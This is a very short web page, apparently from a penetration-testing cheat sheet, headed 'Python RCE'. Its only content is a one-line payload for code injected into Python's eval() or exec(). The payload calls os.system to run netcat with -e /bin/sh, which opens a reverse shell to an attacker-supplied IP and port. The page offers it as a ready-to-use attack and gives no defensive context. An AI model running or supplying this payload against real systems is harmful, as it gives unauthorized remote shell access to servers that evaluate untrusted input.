Skip to content

Python RCE

Reverse shell inside eval() or exec() method

__import__('os').system('nc your_ip port -e /bin/sh')